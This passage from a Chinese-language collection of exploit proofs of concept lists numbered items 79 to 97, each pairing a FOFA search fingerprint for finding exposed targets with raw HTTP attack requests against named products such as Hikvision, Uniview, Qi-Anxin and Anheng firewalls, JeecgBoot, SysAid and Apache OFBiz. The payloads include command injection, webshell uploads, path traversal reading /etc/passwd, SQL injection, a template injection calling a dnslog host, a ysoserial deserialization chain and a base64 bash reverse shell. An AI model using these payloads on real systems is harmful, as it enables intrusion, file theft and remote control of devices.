, M* X" [* w4 e* {) ~Accept-Encoding: gzip3 G# J; h0 w9 v: F; D- F. _& U
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
6 Z/ W  c$ P; Q# b
# o! k+ t; y) @- O: T------YsOxWxSvj1KyZow1PTsh98fdu6l& {9 |! `0 U: R* W* u0 G9 j2 D
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"4 r$ I! G8 m6 v
Content-Type: image/png* W! ^+ x6 e5 J$ G  o( I+ K  s

5 [  [/ L9 \! F  @. JYsOxWxSvj1KyZow1PTsh98fdu6l+ R" p/ k, U' C/ A" w# K' p
------YsOxWxSvj1KyZow1PTsh98fdu6l$ }6 ~# |+ d1 l# z# x# r& K4 u: B
Content-Disposition: form-data; name="target"
5 ]% j$ |* M, m. o& F
* F. ^/ G; N8 y  A4 ~/ D/Applications/SkillDevelopAndEHS/2 [/ j% O+ m2 v" h: g  f2 R
------YsOxWxSvj1KyZow1PTsh98fdu6l--0 j- k/ O' m0 w6 u: K
8 V1 V. p) T# J3 J& W  d6 k5 n
" w/ d! |7 L: F/ y
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1( h6 A" e$ l( Z0 l, O
Host: x.x.x.x
/ c) b& X1 M% A& ^+ C2 Q' t! @, r( f- w. u9 u1 |$ g

" ^( D( N2 C5 W( @" z79. BYTEVALUE 百为流控路由器远程命令执行7 W/ w. w2 f9 k8 z7 s& o6 b
FOFA:BYTEVALUE 智能流控路由器
) |7 ?, `0 e! _. NGET /goform/webRead/open/?path=|id HTTP/1.1) G8 ~( @( J: e$ M1 o# I. R
Host:IP
7 B! C. R& N# a9 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 `3 o' A9 p  J- D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ H3 J9 `* t# T; A- I4 z" A/ [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. }" q0 m. M6 U' c6 M
Accept-Encoding: gzip, deflate
9 D- r$ l: x' d3 x! [8 n9 cConnection: close  H! s0 e& _0 S# L
Upgrade-Insecure-Requests: 1. M9 r6 y' @* w! w, S* t

! L- c4 Q6 ~0 ]- a! E6 k& w7 z8 h
* y1 z# f3 Y2 g' X# W80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- c# X4 W, K7 X; o7 pFOFA:app="速达软件-公司产品"
9 B5 R/ a; f, UPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1: ]' @5 ?. b. j& M' t
Host: x.x.x.x2 G6 A* y$ A5 Q8 x8 L+ f: A( ]6 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% Y% l0 `" P% ]' N8 y6 F+ D% Y( d5 T( nContent-Length: 27
; A7 e3 B+ j, ?, l' I, I7 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  O  |$ p: M$ d
Accept-Encoding: gzip, deflate; P4 |7 g$ }& E6 B$ d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! H, ]1 b! ^7 p: `( kConnection: close
1 u5 C% D0 c# E2 N% E6 ?" g! [Content-Type: application/octet-stream
' P& d5 Q# `+ I9 ~  `+ _Upgrade-Insecure-Requests: 1  n/ b' a* q/ x# M' V# u

% p9 q, ^* o+ \& U5 H<% out.print("oessqeonylzaf");%>
7 v4 I! t7 ~) P
9 V3 ]$ Q2 e8 e% m0 V1 h: x( E6 X! U: {7 @: g# ?
GET /xykqmfxpoas.jsp HTTP/1.17 e7 i# v, L" S! T) k+ C
Host: x.x.x.x6 G) C8 u- _2 i0 r% b  e0 X2 I- m( A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' r% M: j1 z* O5 u5 b" j  N
Connection: close
5 Y, f8 `6 t% n6 t- xAccept-Encoding: gzip) n/ d# t* U/ |. j" z, M

0 Y% m% O7 h) A9 k8 |. `
6 }% w4 c& L. T8 @) _# j3 B81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露4 G$ k& ^$ b' K6 L! \) `5 B, c
FOFA:app="uniview-视频监控"+ V5 l6 s2 ?7 h+ A" S  o+ Q& F
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
$ C; ^# U- _' d/ rHost: x.x.x.x
) F$ ?1 V& a5 ^+ [' _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' v  Z- @* }1 p3 p" CConnection: close
5 V; F. T, A/ I8 GAccept-Encoding: gzip
! J. M/ U1 T. D& [* {% o5 L( [9 x1 `5 O% [

* l7 x, p4 x1 T5 M* h" n5 c- T2 X; l82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 D0 w3 s& t: e7 \! BFOFA:app="思福迪-LOGBASE"; E! x3 C6 P$ G' Z
POST /bhost/test_qrcode_b HTTP/1.19 F7 w. W( w; }5 L$ m
Host: BaseURL
+ m; Q7 c* X. g) J* G: N+ \User-Agent: Go-http-client/1.1" e! u' \" Q+ {" m. |$ u4 U
Content-Length: 23# ~3 H5 W7 O9 K9 b4 L; l
Accept-Encoding: gzip! Q* i% |! X/ d, W
Connection: close
/ @; `: V) m+ w# Z6 D+ Z% G4 |Content-Type: application/x-www-form-urlencoded/ k" U  j& z. q1 U
Referer: BaseURL5 I  ~# s% Y6 a5 K+ y

4 K$ a* p. r" [1 L1 _: L9 Wz1=1&z2="|id;"&z3=bhost
4 Z. e; l$ k; ]
; f7 ]5 W$ ~- ?6 K2 Q4 M, L- f6 y1 x" }
83. JeecgBoot testConnection 远程命令执行
- d2 E; N, N7 Z3 Y( L3 zFOFA:title=="JeecgBoot 企业级低代码平台"$ u; z+ N; ]- c
7 Y) ^- ^; x4 H' B) _& a

1 i* k$ C/ Z( gPOST /jmreport/testConnection HTTP/1.1
8 J( }  q3 c1 _! S5 _Host: x.x.x.x$ f8 `* c( m/ C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ^' J- \% s/ V0 x% ^( ~1 C
Connection: close  I& ~. b- _4 h; Z0 x
Content-Length: 8881
; o$ [, t5 `7 |9 O: EAccept-Encoding: gzip' H" l; S: [, z
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"  e& l- y+ J- v& S- V2 [
Content-Type: application/json8 \6 u2 X  W8 I5 _  H( ^
7 w( l; h; _, a; e. f8 C7 h* M* \
PAYLOAD8 N" M  Y1 M3 y; @: T, Z1 i
# ?6 @; ~! d& F
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
" b; o5 u7 O. H# XFOFA:title=="JeecgBoot 企业级低代码平台"
% F* W5 z! M  P
2 b: C6 w; x* p: [) |( r
2 E7 t1 f$ Y% `5 h4 e  [5 y" K3 W3 Y: c( Y8 q
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
( f. m* A& c3 \Host: 192.168.40.130:8080
2 L. Y* y0 N" E. \User-Agent: curl/7.88.1
+ [& ^2 C) T. Q  @1 r7 `4 T' g, CContent-Length: 1568 d0 G+ D7 s9 l, n2 u
Accept: */*
# C0 A8 C6 ?, M" jConnection: close
# R4 m0 T: M; D" G# e6 W. mContent-Type: application/json
9 ^, b1 t# c' {Accept-Encoding: gzip2 N- J0 H5 x9 h. t/ A% @

- O2 O+ M& ~2 A; j! K5 U{
5 \) S" L0 Q7 ~5 \3 l5 J: u0 E "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",; l6 C% }) g- s" g# u
  "type": "0"
2 ~  t. P; R- _6 I% i) n}
9 i5 v0 L$ e7 @- I, ?. M. b- q) B0 {; `3 J1 |

8 J; j5 }' ?% U* G9 ]! ?85. SysAid On-premise< 23.3.36远程代码执行
! I$ a# o& V! y5 l# [3 qCVE-2023-47246
% j1 R+ C4 z7 D% |: t5 g# zFOFA:body="sysaid-logo-dark-green.png"
& I9 F6 B2 B3 Z. LEXP数据包如下,注入哥斯拉马
7 r( i* E- u8 m2 B2 g6 o# KPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1+ M( C1 g# o" f: x8 j0 i
Host: x.x.x.x
& t! M$ a3 x' |* B5 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 N& v9 P5 w5 y$ I; e
Content-Type: application/octet-stream
: P  _9 m  f2 ]4 W: X7 w4 U& dAccept-Encoding: gzip$ r$ h( L1 x/ H2 p5 F
1 l9 c* T/ v' A5 S/ L* _
PAYLOAD
7 ~) E" Q5 W, S& M( T. r1 Y
8 B7 s5 s: B6 [$ D回显URL:http://x.x.x.x/userfiles/index.jsp
6 J) w+ |% j4 F7 u+ f  X! c  N( l, ?) v5 B. [. y9 r
86. 日本tosei自助洗衣机RCE
0 V4 P5 b3 n8 v, U9 Q3 `FOFA:body="tosei_login_check.php"  z; x  |, M" w; e) E. f: ?' b
POST /cgi-bin/network_test.php HTTP/1.1
) M& y. ~, v1 ^0 G. e, e  gHost: x.x.x.x
. m) f/ ~9 f5 d9 B8 w6 zUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 Q+ D7 s& B; a2 N! o% `% j! N5 Y
Connection: close
! E$ _! i$ ?6 Z4 ]+ U8 gContent-Length: 44
" _1 d- `; f. W' T* H0 ]Accept: */*
8 o, Y4 A% ]3 g& Q+ o  dAccept-Encoding: gzip
! p  `9 U7 X. NAccept-Language: en& a2 {9 T$ i. |8 T' a( ]
Content-Type: application/x-www-form-urlencoded0 N! X2 {3 y! B; O: c& v' U
8 L( F. W; y! f* ~' \
host=%0acat${IFS}/etc/passwd%0a&command=ping
8 o  J# F# s: ?# X
& }$ q+ D# q7 z+ N4 x5 F( h3 ]0 X. \: O9 u  F! p
87. 安恒明御安全网关aaa_local_web_preview文件上传
/ M( e  m* u- K7 Z1 W' sFOFA:title="明御安全网关"
/ x5 p2 V' m9 F8 @6 ?) `7 D. H8 jPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" [3 K7 o5 |$ K* I
Host: X.X.X.X9 L4 R( @: K9 U- q9 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; `7 z! r7 Q5 q3 i
Connection: close/ ?% O! G8 ~9 \7 |- l/ b
Content-Length: 1988 e' X8 `- G7 I' y) D  A
Accept-Encoding: gzip8 Q, @/ ~3 S7 w4 O
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd! _  I! y: y+ d1 o: [2 U9 A' h

# D3 o! U* U- |9 L) u& O--qqobiandqgawlxodfiisporjwravxtvd+ ~; ?1 w" ^$ c  Y- E$ A! E+ y8 S* ^
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
5 s! V% h( w! o" r4 ^* xContent-Type: text/plain
8 u6 W( M4 Z; Z( ^. T+ M" V1 L
9 _# y7 c) _+ [9 X2ZqGNnsjzzU2GBBPyd8AIA7QlDq
- Z$ v3 @- P. M+ I--qqobiandqgawlxodfiisporjwravxtvd--' ]# G' ?( M1 H* V+ G* }" E" T7 I

' }! `1 t- {5 J- ^' T! f/ }6 t  f& y, V% o) [+ c) p
/jfhatuwe.php
& b% j$ @: u) @* ~+ \/ v
% v' n! S6 w9 P- y% o; Z88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行, G" f4 \& y% M$ O; B
FOFA:title="明御安全网关"
  o) ]/ O( g' pGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1! r8 w- {3 m) B
Host: x.x.x.xx.x.x.x( {* ~/ L5 @, q1 I8 Q0 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 q8 V* r& f) e6 M5 M  z. w2 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: u  m0 H* S9 N. P9 h+ g9 l) M( _4 {
Accept-Encoding: gzip, deflate: }2 X* d$ m3 E1 Z/ j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  z( y9 s! j0 R7 I2 sConnection: close% X' u  H! r' U) o9 a

# o7 P  K# x$ g% Z9 f! u" j" I/ u9 u2 i$ R0 s& N2 v  l+ y
/astdfkhl.php
0 F* l* r$ A; e; X# ^9 k, y3 a: V0 T5 S
89. 致远互联FE协作办公平台editflow_manager存在sql注入9 U% i7 Y7 [% q, t
FOFA:title="FE协作办公平台" || body="li_plugins_download", Z2 G2 `" C0 X! `- F! V8 G
POST /sysform/003/editflow_manager.js%70 HTTP/1.1$ B0 E8 _2 l3 Y9 F
Host: x.x.x.x. q. d0 c$ D) w/ g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' H- O* S1 E( {9 X% C: V
Connection: close
& ~2 V& A. l& c8 u7 hContent-Length: 41' g9 Q/ y/ Z7 m: W3 C* h
Content-Type: application/x-www-form-urlencoded
, E- g7 t) t7 _9 B* L' R$ u) IAccept-Encoding: gzip
, U% ?, i1 Z" B6 c8 B2 ?, m' \) Y4 ]2 L: w
option=2&GUID=-1'+union+select+111*222--+
: ~" Y% ]$ T( O. [2 V" N: \7 C2 z. V. e7 y4 q

& {' j& k* B+ }- H7 }3 C" i1 C- n90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
: W; |, ^  b  g' m' [' G  OFOFA:icon_hash="-1830859634"" T8 Y6 w  w- X( E' H! m2 y) I
POST /php/ping.php HTTP/1.1
6 x0 m5 }* R% N! P3 }1 VHost: x.x.x.x" D0 t; P: C0 e; t; {# A$ K- D5 B9 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. F8 H: G, w& M/ Y+ ^, W+ Q
Content-Length: 51
4 W8 i8 [9 J& i: e) O3 D  CAccept: application/json, text/javascript, */*; q=0.010 m% C6 y7 q! p. B, s: J* g7 M2 X
Accept-Encoding: gzip, deflate
9 Y$ x3 q  N( G, I3 t& U* AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 E+ O, A  `5 ]+ n3 f
Connection: close
& l, b/ |$ W0 f: ?$ u2 h7 [/ NContent-Type: application/x-www-form-urlencoded
& l* n4 d5 V' K( U% g% G0 sX-Requested-With: XMLHttpRequest
  e+ U8 j' Z+ k: w1 `, ?. k/ {* P4 \' k; }
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" Y; J% t- J& l1 N# S" L  P5 x* u3 n1 x! z& P! Z* @
1 Y/ U0 k/ y. k
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
4 \1 u/ ^$ t* Z/ P; S4 |  SFOFA:title="综合安防管理平台"8 f7 q1 Q$ x5 q( P- H( }
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' K7 y: y5 U- G/ M$ |- H- o8 C
Host: your-ip2 p6 A4 `9 O1 G# A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ _! s- F# J( `0 `. Z
Accept-Encoding: gzip, deflate7 r& m1 ^# d0 t. _) h% b4 Q
Accept: */*
7 [( y' W% ]7 O1 hConnection: keep-alive  f/ `- r! ?" f" D2 u8 L0 H; J
) N% U1 Z9 c- Z# t/ m* A2 @# F
1 z1 O9 d2 Z+ u! P% Y5 p

6 W% ^, b( g! P& w, W92. 海康威视运行管理中心session命令执行
  L: q! l9 @: {5 J% {Fastjson命令执行4 b( f% n5 h. k: F: }
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
, t/ ]% }/ g" k, X) iPOST /center/api/session HTTP/1.1) g' [4 N" L( h' f7 R$ Y
Host:
8 {$ D1 Y$ L2 wAccept: application/json, text/plain, */*
0 i' ~5 y. d; K: K, SAccept-Encoding: gzip, deflate  ]! R8 z7 d& b' u5 t9 L
X-Requested-With: XMLHttpRequest
6 _! q; t# c, ^2 B2 _Content-Type: application/json;charset=UTF-89 _  ~$ x1 v, r
X-Language-Type: zh_CN5 k. U, u- U5 q) R7 B0 i* i
Testcmd: echo test7 Z# G' b& w" h8 K  K* Q) q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
" X& A0 M9 O4 z, v1 hAccept-Language: zh-CN,zh;q=0.9
0 _; E6 A7 F+ I; k1 B1 kContent-Length: 5778
3 t9 m8 L9 Y; ?9 ]" s+ r2 m- _  I& R7 u- k
PAYLOAD7 r6 n4 k# x# z6 |0 c

+ V! P+ j2 M* F3 u& `+ n' V$ b1 }4 m) ^* U) b& W! y
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
* M+ B  Y4 B, v4 T& T% tFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% n; D' `/ ~9 n) L9 [5 s1 W6 E
POST /?g=app_av_import_save HTTP/1.1$ w8 Z; u: x, H: m
Host: x.x.x.x  X* I  \+ O6 P/ [# L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
5 O8 H; I& e1 Y: OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! }. b2 t3 L3 C4 ~- W- T0 r" t8 I) ~0 y; Z" E8 s7 E8 X' |4 s/ Y; E
------WebKitFormBoundarykcbkgdfx: c! P+ q' A) f) U* t. Y
Content-Disposition: form-data; name="MAX_FILE_SIZE"
6 Q- G: r$ D9 {
9 p% H! F' n+ ?% B* a9 I% B10000000
% P# ^; G: [" N! J, u" u. y5 H0 O------WebKitFormBoundarykcbkgdfx, N3 T0 _1 J1 l7 O7 ]
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"( S1 L* R$ t) N+ Y
Content-Type: text/plain
! W8 `. N9 R( ?# k% n. t) {
$ g6 @9 y; O9 A: T, @wagletqrkwrddkthtulxsqrphulnknxa  [9 S" l1 t* [, e' G
------WebKitFormBoundarykcbkgdfx: V2 u! W4 A/ d2 B" L
Content-Disposition: form-data; name="submit_post"
) O* C% b- H: H: Z+ ?8 D# R& ~; G$ g: R3 @$ Z+ i
obj_app_upfile
; _+ f0 \! w* g, R/ O; x------WebKitFormBoundarykcbkgdfx
2 }2 U6 D2 A! j! m  NContent-Disposition: form-data; name="__hash__". D( {. Z- D! W5 V# v/ p9 u- |
; t0 ]1 R9 t* L- r/ N6 R- |
0b9d6b1ab7479ab69d9f71b05e0e9445
, b6 D' r& u1 ^2 m, d------WebKitFormBoundarykcbkgdfx--# R+ @9 Q) F( w8 ]
. b2 b$ ^1 u' d0 _* F
3 G8 Y% z6 D' A- I$ t% w
GET /attachements/xlskxknxa.txt HTTP/1.1# P7 T* ^) q3 t1 N1 v
Host: xx.xx.xx.xx; ^! F# u, _; n( r0 C; e5 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ E3 b$ }: M6 i" N: k5 J- n* E! r
( R, C+ j7 f! A6 A5 h2 u9 ]
  E$ s% O6 A* _+ W0 u# F1 |2 O! n94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传1 h/ R! T9 ?# X# H+ u5 j" ^
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
  Q: q& _/ J: ^) l* I3 L2 sPOST /?g=obj_area_import_save HTTP/1.1
- g/ M( y, N6 T( G8 [8 n3 {  LHost: x.x.x.x
! Q. @5 F- x0 K* w) L/ uContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt, ~% V! Y% x  N8 \6 x( }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 j- {; j/ q' @2 O4 w$ C  I% W+ ?- ]9 k$ O" D2 y/ Y1 Y% [; z( e2 r, ^$ D- ^
------WebKitFormBoundarybqvzqvmt4 {4 R& }4 W" n
Content-Disposition: form-data; name="MAX_FILE_SIZE") t: \9 d/ Y/ n. l: }: F1 z* [  Q8 A

. o! N" J8 P5 }9 ?: j5 A' x10000000" r( q8 i; F) B* L4 W
------WebKitFormBoundarybqvzqvmt
& J* L( H# P4 T+ `. d0 BContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"+ l+ y4 {$ c8 S) H$ e, M  E8 {
Content-Type: text/plain
" t, P9 t. v, h# `7 l. N2 U/ A; H* T& P% u8 A3 F4 x/ ~+ ?5 p
pxplitttsrjnyoafavcajwkvhxindhmu- B+ o' o5 g' A! a0 J
------WebKitFormBoundarybqvzqvmt, a. Y: w0 i5 R; N
Content-Disposition: form-data; name="submit_post"  J9 w0 }' |; q, Y. L# C1 x2 r% {

6 w/ y  t3 J& a, yobj_app_upfile5 A  N( d+ ?! F: t, e
------WebKitFormBoundarybqvzqvmt5 j4 h6 c! v% l; Y
Content-Disposition: form-data; name="__hash__"
* x& T0 x9 e# S9 X" d% q; N$ V! b! @1 r/ N! q
0b9d6b1ab7479ab69d9f71b05e0e9445* O: m' \2 P% f6 {5 ^/ G; a$ P
------WebKitFormBoundarybqvzqvmt--
: w) c2 ]/ C* z  A6 |1 B# u$ m
3 E7 m; G; g4 F8 ~+ u2 p) d0 B( @/ I' g9 d& Z! a8 T
; S( W* a& h, n) Q
GET /attachements/xlskxknxa.txt HTTP/1.1
% u5 E" z; V3 RHost: xx.xx.xx.xx
2 w' ^- b, r: e9 s) J7 iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ c3 |$ u2 e" ?1 t8 L8 L5 W
3 t0 z, Z/ k; W. Y, [+ z7 o
1 A/ p; f/ s, t; i; l7 Q, ]  z9 Z3 L! s- g
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
' m1 @4 N  ?) X7 FCVE-2023-49070! Z) V1 ?0 x- R3 r# k
FOFA:app="Apache_OFBiz"; K- @8 q7 o  N, Q' H2 v5 w7 K& \
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
9 _; \2 f4 H; E/ C6 E/ GHost: x.x.x.x+ ?0 O9 C/ ^& l, Q' R% O6 Q7 I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 S% {6 [  C/ z3 _* ]Connection: close# Z8 d$ a0 d# N  o' `8 f
Content-Length: 8899 k& l7 \/ C8 e5 q2 R, k
Content-Type: application/xml
9 C6 ~, u' ^3 b- W' A1 ^Accept-Encoding: gzip
- ]0 k# e$ g1 b3 Q6 p
1 y7 p! x- h& X. ^* B: W6 ~<?xml version="1.0"?>4 q0 R" N, ~+ f$ y( T
<methodCall>
! P  ^. \5 ~( x  R1 M   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>8 g! e/ u3 K+ S) L- ?6 D& K! G
    <params>
3 W1 ^- r. I! R# h% i2 H      <param>
& O$ i9 x( n9 d4 ^: T      <value>
" ~' L+ o0 a  U) c        <struct>6 I. Z8 Z, _0 D# f8 L1 Z& k8 }4 N
       <member>3 K# [: l$ s3 b7 _2 x7 B
          <name>test</name>) f! O/ T: F# [! A
          <value>
* w8 j5 t! u" r3 z      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>; d" H; J; e3 I. G% E& k1 F. u: |
          </value>. l* v. x6 B" a, Y+ o5 K6 c5 w
        </member>( F$ ~! ~1 ?" ~+ S
      </struct>. i# O- a$ w5 {  p% ?, v
      </value>; r% u- z) Q" {' x
    </param>8 }& F# ?+ l) H. l4 W- S' \# Q5 [  p
    </params>8 {6 E( m5 M  e- y
</methodCall>1 F: x. a* I( ~$ G) F! l. r
9 v% b- s0 f0 q3 L
7 Y4 E! ^3 H5 b. V
用ysoserial生成payload
$ f  k& H; j$ Y* ^java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
5 ?' s1 u8 P4 T& u- \* r, Z0 F! G  u& F
5 S! Y: W+ e: R5 f" G& d  m2 N" n
将生成的payload替换到上面的POC
: H5 d% D7 ?3 {( {POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 J0 R* P2 `- d: a8 j- s7 O+ m
Host: 192.168.40.130:8443
6 G. S. N2 ?7 ?5 x, bUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- |* E5 v3 w& g7 jConnection: close
6 Z) J: ?8 \9 W: X6 V! mContent-Length: 889) k3 ?3 }4 g: @- ]; d/ U
Content-Type: application/xml
  p1 M8 V8 z' |) m- _& V* Z/ HAccept-Encoding: gzip5 a& M- t* D6 ]9 i8 `+ C$ ^8 o
* v3 j4 W+ Z8 ~8 G1 r
PAYLOAD
( L8 v+ }. {) H5 Y) J9 h7 T
4 a% z8 X3 X  V) R96. Apache OFBiz  18.12.11 groovy 远程代码执行
9 c: o! _8 i/ s) KFOFA:app="Apache_OFBiz"5 A5 g7 u1 V) L: O7 ?
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
  p% V  O) Q# ?4 t" ~Host: localhost:8443
( h1 f4 q3 |& Q4 j, C0 D  d9 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 O6 P/ `. s0 \/ [4 M$ d  `- r
Accept: */*- e3 S& T1 o2 v+ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 D$ n* }; \$ |: D- E. l- ZContent-Type: application/x-www-form-urlencoded
) h" I' ~+ y3 z( i% g# dContent-Length: 55
* t  U/ ~; p3 f3 j$ g; b' `+ K- w
groovyProgram=throw+new+Exception('id'.execute().text);8 n; K6 R& [2 K+ d

* s/ s& {" p( K- U5 w8 w( A7 I
) P, P" \9 }$ a7 v0 _: v反弹shell
" |% x" Y* M* e% G3 C在kali上启动一个监听
1 k  w- Z, J) h! t8 f  M5 Vnc -lvp 7777
6 H1 F& b  P! F5 g# W8 v
+ T* g7 ^6 N8 R7 \. o0 zPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 i9 R: k5 Z; Y* ^% _, M2 W
Host: 192.168.40.130:8443
( y, J0 ?! d2 G1 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0  {. o7 m% J, h. E" Z
Accept: */*
. V; \( ?4 x% j$ j& P8 o, FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 m# y7 l! v5 \! E; l- o3 |
Content-Type: application/x-www-form-urlencoded
3 R" D: Y$ |* z( tContent-Length: 71! S7 l0 H, z2 c* S7 l$ S
0 N; B6 ]) `# G& Q2 ?% e7 w6 S" _
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
9 m, p# E$ F: U  m. q( G+ y* m- X- v9 V
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% Y: p. {- [% s/ qFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"0 l  F; ^, ?9 K. A6 E" k
GET /passport/login/ HTTP/1.1
8 ?1 K7 O( |1 v5 ~5 c0 N* |  Z6 bHost: 192.168.40.130:8085
